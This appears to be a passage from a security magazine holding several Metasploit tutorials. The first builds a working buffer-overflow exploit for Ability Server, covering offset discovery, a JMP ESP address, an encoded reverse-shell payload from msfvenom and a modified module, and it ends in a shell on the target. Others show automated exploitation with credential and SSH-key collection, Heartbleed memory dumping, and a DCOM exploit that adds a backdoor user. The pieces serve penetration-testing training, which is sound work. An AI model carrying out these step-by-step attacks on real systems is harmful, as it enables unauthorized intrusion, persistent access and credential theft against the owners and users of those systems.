At this moment the fuzzer stops working, you can see approximately the size required for crash the stack.
Figure 13. The crash fuzzer
If you go to the target, in the installation directory you can find the directory log, if you open the last log file
you can see the payload sent by the fuzzer, this payload is a non-repetitive pattern of characters.
Figure 14. The crash log
Now you are sure which application is vulnerablelets start finding the offset and the return address, for
do this I start the Ability Server with my favorite debugger, Immunity Debugger, if you prefer Olly or other
debugger, no problem, the result will be the same ( I hope).
Figure 15. Immunity Debugger
After crash you can copy the result of EIP, in our example 42326742
Figure 16. EIP
and we can go to pattern_offset script for show the real offset, the sintax is pretty simple: ./patter_offset
42326742 the response is the offset for EIP, in our case 966 ok, now I have the offset
Figure 17. Pattern_offset
If you dont use the fuzzer in the framework, but a script in phyton or other scripting languages, you can get
a pattern with the script pattern_create, and after you can copy and paste the string in your script, when the
application crashs, you can get the value in EIP frpom the devbugger and after you can use pattern_offset,
the syntax is ./pattern_create number_of_charin my example:
./pattern_create 2000
Figure 18. Pattern_create
Now I need the return address for ending my exploit, I want to use only the framework today, and I will use
Msfpescan, (you can find this value in others way, you can use the button E in your debugger for find the
address in DLL, or you can use findjump2 in windows machines), msfpescan can find a lot of interesting
information, today I search only a jump ESP, but if needed we can find other jump or pop pop ret, msfpescan
can also trying to identify packersbefore start the tool I need to put my DLL somewhere, I put the DLL in
the /tmp directory, like the Offensive Security PWB course I use USER32.DLL, the sintax now is:
./msfpescan -j esp /tmp/user32.dll
The first address returned from the tool is 0x7e3a9353, this address havent double zero and look good.
Now I am ready to make my exploit working, I have the offset, I have the Return Address, I need only
the payload, if I want a stand alone exploit, lets goI can use msfvenom, or if I like legacy world, I can
use msfpayload in pipe with msfencode.I prefer msfvenom, for better performance, but for educational
purpose I show you also the syntax of msfpayload, in the example I want to get a reverse shell, but I want to
use netcat as a listener, the correct payload is windows/shell_reverse_tcp:
./msfvenom -p windows/shell_reverse_tcp LHOST= -e x86/shikata_ga_nai -bx00 -i 5 -f c
The p is the choosed payload, the LHOST is the listener host, the listener port is the default port tcp 4444,
-e is the encoder, in this demo is shikata_ga_nai, with -b I dont want bad-char 00, -i is for 5 iteration and f
is the format, C language in the example, the C format is good also for phyton script.
Figure 19. msfvenom
If you want to do the same with old commands you can use this sintax:
./msfpayload windows/shell_reverse_tcp LHOST= R | ./msfencode -t c -e x86/shikata_
ga_nai -c 5,
It is really like to that of msfvenom, the R in msfpayload is for create a Raw payload, and the c in
msfencode is the same of I in msfvenom
Figure 20. msfpayload and msfencode
And now you can copy and paste the shellcode in your script and start the listener
But today I dont want any type of script, and I prefer to modify the metasploit module for Ability Server, in
real life I think is better to copy the exploit before editing, but for educational purpose I will edit the original,
the module is exploit/windows/ftp/ability_server_stor, the ruby code is located in /opt/metasploit/msf3/
modules/exploits/windows/ftp, with my preferred editor I will edit the module, adding windows XP SP3
itakate ability_server_stor.rb
Figure 21. Targets in metasploit modules
I search the targets in the module, as you can see, in the module I have only two targets, I will add another
one, I copy the section between the bracket and I substitute the old value with my discovered value, I put
7E3A9353 in RET, the offset is unchanged and I edit the title of the target
Figure 22. New targets
now I start the msfconsole and I try to exploit my windows machine,
use exploit/windows/ftp/ability_server_stor
set TARGET 2
set PAYLOAD windows/shell_reverse_tcp
Figure 23. Settings the modified exploit
Like in msfvenom my payload is a netcat-like reverse shell, lets go try to p0wn the windows machine
Figure 24. gotcha
Well, all work is good
The porting of new exploit in metasploit is beyond the scope of my article and I stop here, but this is only
the beginning, you can improve your skills with some interesting article for create your own metasploit
modules, my favorite one is in corelan website from Peter Van Eeckhoutte:
php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/, but you can find
already excellent pages in the metasploit-unleashed site from Offensive Security: http://www.offensive-,
About the Author
I work as I.T. Pro since 1987, I am a freelance consultant, pentester and trainer, I
work especially in banking environment. Over the years I have achieved several
certifications, including: MCT, MCSA, MCSE, Security +, Lead Auditor ISO 27001,
In 2011 I was awarded the Ec-Council Instructor Circle of Excellence.
I can be contacted at
Pentesting with Metasploit Pro
by Cristian Stoica
In this article well have a look at Metasploit Pro. The starting point will be the installation
and well finish with the preparation of a report.
What you will learn...
Setting up Metasploit Pro
Defning a project
Running a check on a specifc target
Validating the results
Document fndings
Prepare a report
What you should know...
Operating system skills
Mail servers, web servers and other services
Lets start by understanding what does a penetration test or pentest actually mean.
According to Wikipedia a pentest is an attack on a computer system with the intention of finding security
weaknesses, potentially gaining access to it, its functionality and data
If we look at NIST SP 800-53 Revision 4 they define penetration testing as a test methodology in which
assessors, typically working under specific constraints, attempt to circumvent or defeat the security features
of an information system.
Penetration testing will help us identify threats, provide assurance to the organization, adopt and comply
with legal requirements, best practice and last but not least will help an organization determine what must
be done to prevent exploitation. There are two scopes of penetration testing: non-destructive and destructive
tests. Do not engage in such activities without proper authorization and planning. Imagine what will be the
result if you try this and end up running a one shot exploit which might render a business critical process
The first step will be to perform the installation process which is simple. Once the setup is completed well
need to access the platform via web in order to set the username, password and other optional info.
Figure 1. New User Setup
The following step will be activating the product.
Figure 2. Product Activation
Once weve activated the product this will be confirmed in the next screen.
Lets make sure we have the latest version. For this we need to click on the Administration menu in the
upper right corner and select Software Updates. In this case a new version was available.
Figure 3. Software update
Since this is a new project, well have to define it.
Figure 4. Adding a new project
For testing purposes Rapid7 is offering a virtual machine which can be downloaded to validate the features
of Metasploit.
Make sure your test lab is properly configured and it prevents unauthorized access. If you can hack it,
somebody else can also and the last thing you need is to introduce a backdoor in your infrastructure.
I shall skip the part where we configure the test lab so that we can focus on the functionalities of the
Now that we have also a target its time to start defining the targets. The platform allows us to fine tune the
process according to our needs.
Figure 5. Discovery
We can even define if we need to scan for devices with SNMP management using a variety of community
strings. There are other options available such as: scan hosts individually (this will result in a slower
scanning process, however it will speed up the population of the database process), dry run. The discovery
process can be customized to include credentials. Fine tuning of the web scanning settings can be performed
also (maximum requests, time limit, concurrent requests).
Figure 6. Fine tuning the discovery process
Last but not least we can configure also the web crawler for basic authentication, seed the initial cookie
request and change the HTTP user agent.
After weve finished setting the discovery parameters its time to hit the Launch Scan button in the bottom
right corner to start the task.
Figure 7. Discovery task running
Once the process is completed were presented with a summary: number of hosts, services.
Figure 8. Discovery task completed
Now its time to check if we can exploit some of the services discovered. In order to perform this task we
simply have to click on the exploit button presented in Figure 8. Discovery task completed.
The automated exploitation attempt configuration will be presented in the next screen. If we decide to target
only one of the hosts discovered we can do that by leaving only that equipment in the target address. By
default the reliability of the exploitation is set to great. Once more please note that this can render a service
unavailable. There are several options in terms of reliability: excellent, great, good, normal, average, low.
Figure 9. Defining the automated exploitation settings
Of course there are several options available for fine tuning such as:
excluding target addresses,
payload settings
payload type: Meterpreter or command shell
connection type: automatic, bind (which is good for cases where NAT is available and all ports on the
target system are not blocked) and reverse.
listener ports
listener host
auto launch macro
enable stage encoding for IPS evasion
exploit selection
included ports
excluded ports
skip exploits that do not match the host OS (we need to be careful since the OS fngerprinting might
fail due to devices that are masking it)
advanced settings
concurrent exploits
transport evasion (each level applies different techniques: low is using delays in TCP packets, medium
is sending small packets and high combines both)
application evasion
web application identifcation settings (HTTP basic authentication, initial cookie, user agent)
After we have defined the required settings all we need to do is click on Exploit and let Metasploit work its magic.
A review of the settings that were chosen will be presented at the beginning of the exploitation task that is running.
Figure 10. Attempting to exploit the hosts
During this process if an exploit is successful a new session is created and well be able to see it in the
Sessions menu.
When the task is completed we can review the results.
Figure 11. Automated exploit task finished
Since we have a session opened its time to collect some info and all we have to do is click on Collect button
from Figure 10. Automated exploit task finished.
Evidence we can collect:
System information
System passwords
*Nix Shell
SSH keys
Installed Applications
Logged on Users
Primary Domain
Collect other fles (we need to defne a flename pattern, maximum fle count and maximum fle size)
After we have selected the information we require we need to click on the Collect System Data button.
A new task is created in which we can see the progress and information about the data collected.
Figure 12. Data collection task started
Once the task is completed we can have a look at the host in order to see an overview of where we stand.
Figure 13. Overview host
The information is grouped several tabs: services, sessions, vulnerabilities, credentials, captured data, notes,
file shares, attempts and modules.
The collected credentials will be added to a repository so that we can use them to try to gain access.

Figure 14. Host collected credentials
Since we still have an active session we can even open and have shell access on that specific server.
Having direct shell access is basically giving us full unlimited control in terms on what we want to do with
that system.
Figure 15. Shell access
Metasploit is providing also the option to start a web application scan, perform a web application audit and
exploit the web application.
There are a number of predefined reports available including for PCI-DSS and FISMA compliance. Reports
can be customized, new reports can be created.
Figure 16. Audit report
Metasploit has many features including Phishing Campaigns, Quick PenTest, Vulnerability Validation, Web
App Testing all delivered in a very clean and simple format with just a few clicks.
With the Pro version you get also Team Collaboration, VPN pivoting, Automation through Wizards, Social
Engineering, Metasploit Pro API, Vulnerability Validation and many other interesting and useful features.
You can use it as a standalone tool or start integrating it with different platforms from different vendors.
Its scalable, reliable and it comes in many versions which should cover existing needs.
About the Author
Cristian has a vast expertize in IT, Cyber Security, Risk Management, Governance.
Currently he is the IT & Cyber Security Director for UTI Grup. He is actively involved in multinational
security initiatives and alliances, acts as a certified trainer for IT & Security and is a speaker at various
summits and events. Previously he has covered several senior management roles in the financial industry,
telecommunication, security. His professional services were endorsed by governmental and private
Hes involved in managing the development and implementation of the security strategy and global
security policy, standards, guidelines and procedures to ensure ongoing maintenance of security and
works with other executives to prioritize security initiatives and spending based on appropriate risk
management and/or financial methodology, maintains relationships with law enforcement and other
related government agencies.
He currently holds certifications from: EC-Council: Certified EC-Council Instructor, C|CISO (Certified
Chief Information Security Officer), Certified Ethical Hacker (CEH), Computer Hacking Forensic
Investigator (CHFI)
ISACA: CISA (Certified Information Systems Auditor), CISM (Certified Information Security Manager),
CRISC (Certified in Risk and Information Systems Control), Mandiant: Advanced Malware Analysis,
ISC2: SSCP, ISO 27001 Lead Auditor, IAEA & CNCAN: Information and Computer Security for
Strategic and Critical Infrastructure, CISCO: CCAI, SonicWALL: CSSA, Symantec, IBM, McAfee,
Veeam and other institutions and is certified in Security, Risk, Weapons and Ammunition, Strategic
Management, Leadership and Managerial Communication.
You can reach him at:
HeartBleed Bug Exploiting with
by Alessandro Parisi
Well introduce the HeartBleed Bug (CVE-2014-0160), analyzing the impact on
vulnerable server and the inherent attacking surface; then well show how the Metasploit
OpenSSL Heartbeat (Heartbleed) Information Leak module works and its use in
penetration test scenarios.
The bug consists in an implementation problem in OpenSSL library that provides cryptographic services
such as SSL/TLS to applications and services, and it is not a design flaw in SSL/TLS protocol specification.
OpenSSL versions affected by the bug are as follows:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release
1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.
The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory
data in the response allowing remote attackers to obtain sensitive information from process memory via
crafted packets that trigger a buffer over-read.
A buffer over-read happens when a program, while reading data from a buffer, overruns the buffers
boundary and reads adjacent memory.
Buffer over-reads can be triggered, as in the Heartbleed bug, by inputs that are designed to exploit a lack of
bounds checking to read parts of memory not intended to be accessible.
The Heartbeat Extension and OpenSSL-Heartbleed
The Heartbeat Extension provides a new protocol for TLS allowing the usage of keep-alive functionality
without performing a renegotiation.
Heartbeat Extension for the Transport Layer Security (TLS) is defined in [RFC5246] and [RFC6347] and the
adaptations to specific transport protocols are described in [RFC3436], [RFC5238], and [RFC6083].
To set up a TLS connection, a negotiation is needed and thats relatively expensive in terms of time, due to
the fact that several messages have to be exchanged between the client and server, before they can issue a
trusted connection.
The Heartbeat extension overrides these limitations sending keep-alive messages between client and
server, so reducing the number of negotiations
The client sends a Heartbeat message consisting of a payload and a header containing the size of the
payload: i.e. a Heartbeat request of size 5 and a text payload containing the string Hello.
When the webserver gets that request, it saves the content of the payload in memory, as well as the size of
the payload (5 bytes, in our example).
Then, when the server sends a keep-alive response back to the client, the OpenSSL library reads the next
5 characters of memory starting from where it stored the payload and sends it back to the client (who checks
that they received the right data back, the string Hello in our example) so keeping the connection alive.
The Heartbeat implementation in the vulnerable OpenSSL library never checks that the payload size
corresponds with the actual length of the payload sent by the client.
So the client can freely input a size value up to 65535 (64 kilobytes) regardless of the true size of the
payload. If an attacker sends a Heartbeat request saying the size is 65535, but a payload thats only 1 byte
long, the vulnerable server will store only 1 single byte in memory.
However, the response will start with that single stored byte, but continue reading data from the next 64KB
of server runtime memory, sending data read back to the client.
This data could contain usernames and passwords, private keys, garbage memory, even the certificate that
the webserver uses to state its identity.
The attack can be repeated continously, extracting different parts of the webservers runtime memory at each
iteration, and can be performed anonymously in an undetectable manner, as the attack can be issued early in
the negotation process, before any webpage is served.
Impact and attacking surface of HeartBleed bug
Netcraft has existimated that (
websites-vulnerable-to-heartbleed-bug.html) half a million widely trusted websites were found vulnerable to
Heartbleed bug; among them, there were Facebook, Yahoo, Dropbox, Instagram.
According to the NationalJournal (
and-didn-t-tell-the-government-20140414) Google knew about the bug, but it didnt alert anyone in the
Neel Mehta, a Google engineer, first discovered Heartbleed in March 2014, while the Finnish security firm
Codenomicon discovered the flaw around the same time.
So Google was able to patch most of its services such as email, search, and YouTube before the bug was
publicly disclosed on April 7th.
The Heartbleed bug in practice
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the
vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service
providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows
attackers to eavesdrop communications, steal data directly from the services and users and to impersonate
services and users.
Basically, an attacker can grab 64K of memory from a server. The attack leaves no trace, and can be done
multiple times to grab a different random 64K of memory. This means that anything in memory, from SSL
private keys, to user keys, is vulnerable.
In Figure 1 you can see depicted the normal usage of Heartbeat protocol and a malicious request:
Figure 1. Credits to FenixFeather (Inkscape) [CC-BY-SA-3.0 (
sa/3.0)], via Wikimedia Commons
Metasploit OpenSSL Heartbeat Information Leak
The Metasploit Openssl Heartbleed module (available at:
supports several actions, allowing for scanning, dumping of memory contents, and private key recovery; we
can use the Metasploit OpenSSL-Heartbleed module to exploit the bug, or to detect vulnerable systems, too.
Before launching the module, update Metasploit to get the latest modules. Just type msfupdate at a
command prompt, as in Figure 2:
Figure 2. msfupdate
Now run msfconsole to start Metasploit console, next search for the heartbleed module typing search
heartbleed,as in Figure 3:
Figure 3. Search heartbleed
At the command prompt, now type use auxiliary/scanner/ssl/openssl_heartbleed(Figure 4) to actually load
the module, and then type show options to get a list of available mobule options:
Figure 4. Use auxiliary/scanner/ssl/openssl_heartbleed
We only need to set just a few options: set RHOSTS to set the target IP address, then set RPORT to set
the server listening port, optionally set VERBOSE to true, and finally type run the launch the exploit as
in Figure 5, where you can see the output of a successful exploitation conducted against a vulnerable server:
Testing for Heartbleed vulnerability without
exploiting the server
A modified version of the Metasploit module has been released by David Chan, Mozilla Security Engineer
(available at:
exploiting-the-server/); the modified Metasploit module neither accesses sensitive data nor impacts service
performance, and it is aimed at helping organizations conduct safe testing for Heartbleed vulnerabilities.
While there is a higher chance of a false positive, this test should be safe to use against critical services.
Figure 5. Source:
About the Author
Dr. Alessandro Parisi, Ethical Hacker, Big Data Scientist, Business Strategist
An IT Professional for over 15 years, specialising in Ethical Hacking, Big Data Analytics and Business
Master Degree in Statistics and Econometrics, I also qualify as Business Strategist, covering overall
implications of Innovation and Knowledge Management process in complex organizations.
Blog: | WebSite:
Exploit a Vulnerability with Metasploit
by Azza NAFTI
Companies invest in Security Program to protect their infrastructures, in order to identify
vulnerabilities in the system, and thus avoid serious data breaches.
A penetration test is one of the most effective ways to identify weaknesses and gaps in these programs. This
test attempts to bypass security mechanisms, in other words Penetration Tester is able to identify ways in
which an attacker might be able to compromise the organization and damage to the organization as a whole.
Why Metasploit?
Metasploit is an open source tool for the development and execution of exploits (malicious software) against
a remote machine, it allows to carry out audits in security, test and develop his own exploits. Originally
created in Perl programming language, Metasploit Framework has been completely rewritten in Ruby
language. It is often used by system administrators to test the vulnerability of computer systems to protect
them, or by hackers for the purpose of piracy.
First, define some terms:
An exploit is the means by which a hacker or penetration tester takes advantage of a vulnerability in a
system, applicsation or service. An attacker uses an exploit to attack a system and the result of this attack
leads to enforcement of codes of this feat as the developer had planned.
This is the code that will be executed after being introduced into the target machine.
The payloads are delivered by the Framework, for example, reverse shell is a payload that creates a
connection between the target machine that the attacker who referred to it a DOS command prompt, while
bind shell is a payload that connects a command prompt to a listening port on the target machine, it stays
there listening patiently waiting for the hacker to connect it.
The steps of exploit a system
The basic steps for exploit a system are:
Choose and confgure an exploit
Check if the target system is referred sensitive to exploit selected.
Choose and confgure a payload
Select the encoding technique to encode the payload so that systems do not detect prejudices.
Run exploit.
From theory to practice: Attack on Windows XP
The target is a Windows XP. We will use dcom an exploit based on an RPC flaw. We compile it: gcc
Having specified no parameter to GCC compiled the file named a.out. The first parameter is the target
system. The second is the IP of the victim.
So we retrieves the IP of our client (cmd => ipconfig) and like this the exploit worked and we have access to
the target shell and are placed on the desktop of the victim.
In exploit which we have used with Metasploit we could change the payload (the Windows shell) by the
desired Start msfconsole. After a few seconds you will see a msf> console. Do a search on the exploit
previously used dcom with the search command. When the results appear use the exploit found
with use.
By making a show options we see that lack for example RHOST he is the target.
Then we choose our payload: SET PAYLOAD / windows / adduser
Repeating a show options now we see the payload parameters (user / pass = metasploit). This means that
the payload will add a user metasploit.
Test run the exploit with the command exploit. The user has been created!
We saw how easy it was to exploit a vulnerability with metasploit.
It only remains to wish you good luck in its use.
About the Author
Graduated in Computer Science and Quality. She works at Cassiopae MEA as
Technical Consultant since 2010. Contact:
nipper studio
Titanias award winning Nipper Studio confguration
auditing tool is helping security consultants and end-
user organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a
thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at